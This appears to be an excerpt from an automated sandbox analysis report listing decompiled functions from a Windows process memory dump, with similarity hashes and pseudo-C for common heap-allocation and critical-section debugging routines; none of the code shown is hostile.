                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                      • Instruction ID: 7ef5a600dca2dd839e10b5ad3b2bc81659f39fbad74460e454f71266bc9d023b
                                                      • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                      • Instruction Fuzzy Hash: E8D0E935352A80CFD716CF1DC954B1573A9BB45B44FC504A0E901CBB65E62CED44CA00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0498A537, Relevance: .0, Instructions: 11COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0498A537(intOrPtr _a4, intOrPtr _a8) {

				return L04928E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                      0x0498a553

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                      • Instruction ID: aa6ea71fa49f11967141c9d85d6e1ab374040e3f89c79adeb89b5a0e671b53a3
                                                      • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                      • Instruction Fuzzy Hash: 55C01232080248BBCB12BE81CD00F067B2AEB94B60F008020BA080A5608632E970EA84
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0490DB40, Relevance: .0, Instructions: 11COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0490DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04924620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                      0x0490db4d
                                                      0x0490db54
                                                      0x0490db5f
                                                      0x0490db56
                                                      0x0490db56
                                                      0x0490db5c
                                                      0x0490db5c

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                      • Instruction ID: 2e85d19d439a0f739afbdee9d767aab5b1354fa2dadef1735076347354af4469
                                                      • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                      • Instruction Fuzzy Hash: 49C08C30280A00AEEB225F20CE01B0036A4BB40B05F4400B06300DA0F8DB78E901EA00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0490AD30, Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0490AD30(intOrPtr _a4) {

				return L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                      0x0490ad49

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                      • Instruction ID: 60359d7c2a6bc853700ac7aede88ddfaec889a8b14e0513deff137237c113470
                                                      • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                      • Instruction Fuzzy Hash: F5C08C32080248BBC7126A85CE00F017B2DE7E0B60F000020B6040A6618932E860D588
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049336CC, Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E049336CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04924620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                      0x049336d2
                                                      0x049336e8
                                                      0x049336d4
                                                      0x049336e5
                                                      0x049336e5

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                      • Instruction ID: c72830ba4718f72b2a4bb2f173a84827a6ab2eba211834a00c8917bf9c1a50f0
                                                      • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                      • Instruction Fuzzy Hash: F8C09B75195440FFE7255F30CF51F157258F741A66F6407747221495F4D569BD00DA04
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 049176E2, Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E049176E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                      0x049176e4
                                                      0x00000000
                                                      0x049176f8
                                                      0x049176fd

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                      • Instruction ID: 5778ff10330552612ca2d2a2a29fa6e542682b50230d5988d753923424eda9ad
                                                      • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                      • Instruction Fuzzy Hash: 2FC08C701411895AFB2A6B88CE30B203658AB68748F4809FCAA11194B1C368B842C209
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04923A1C, Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04923A1C(intOrPtr _a4) {
				void* _t5;

				return L04924620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                      0x04923a35

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                      • Instruction ID: d00ad77bccb00c157aaa3fc26822d100ae86a794efdaaf397703aa0d628c5191
                                                      • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                      • Instruction Fuzzy Hash: 10C04C32180648BBD712AE45DD01F157B69E794B60F154021B6040A5658576ED61DA98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04927D50, Relevance: .0, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04927D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                      0x04927d56
                                                      0x04927d5b
                                                      0x04927d60
                                                      0x04927d5d
                                                      0x04927d5d
                                                      0x04927d5d

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                      • Instruction ID: a40a3d8a626c5633fef01518db0130d6d01e877aeff4749b5008a890570c0d8e
                                                      • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                      • Instruction Fuzzy Hash: EAB092343019408FCF16DF28C180B1533E8BB44A40B8400E0E400CBA20D229E8008900
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04932ACB, Relevance: .0, Instructions: 5COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04932ACB() {
				void* _t5;

				return E0491EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                      0x04932adc

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                      • Instruction ID: 6b646464d8e2eb1469f1c65640151a1fa07e3e4e8b208be667f9ef63a5668ccc
                                                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                      • Instruction Fuzzy Hash: B0B01232C50444CFCF02EF40C610F197331FB40750F0544A0940127970C228BC01CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0499FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 53%
                                                      			E0499FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0494CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04995720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04995720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                      0x0499fdda
                                                      0x0499fde2
                                                      0x0499fde5
                                                      0x0499fdec
                                                      0x0499fdfa
                                                      0x0499fdff
                                                      0x0499fe0a
                                                      0x0499fe0f
                                                      0x0499fe17
                                                      0x0499fe1e
                                                      0x0499fe19
                                                      0x0499fe19
                                                      0x0499fe19
                                                      0x0499fe20
                                                      0x0499fe21
                                                      0x0499fe22
                                                      0x0499fe25
                                                      0x0499fe40

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0499FDFA
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0499FE2B
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0499FE01
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                      • API String ID: 885266447-3903918235
                                                      • Opcode ID: ab3239b643f59fde70cb301c21bb8c76259005d2a0c43f742751511d9ada110d
                                                      • Instruction ID: 44890b2951533b62b7e173179b2f513ec42b8732beee4e416d0d00f70c955994
                                                      • Opcode Fuzzy Hash: ab3239b643f59fde70cb301c21bb8c76259005d2a0c43f742751511d9ada110d
                                                      • Instruction Fuzzy Hash: CAF0F632240201BFEA211A89DC06F23BB9AEB84734F150724F628965D1EA62FD60D7F4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%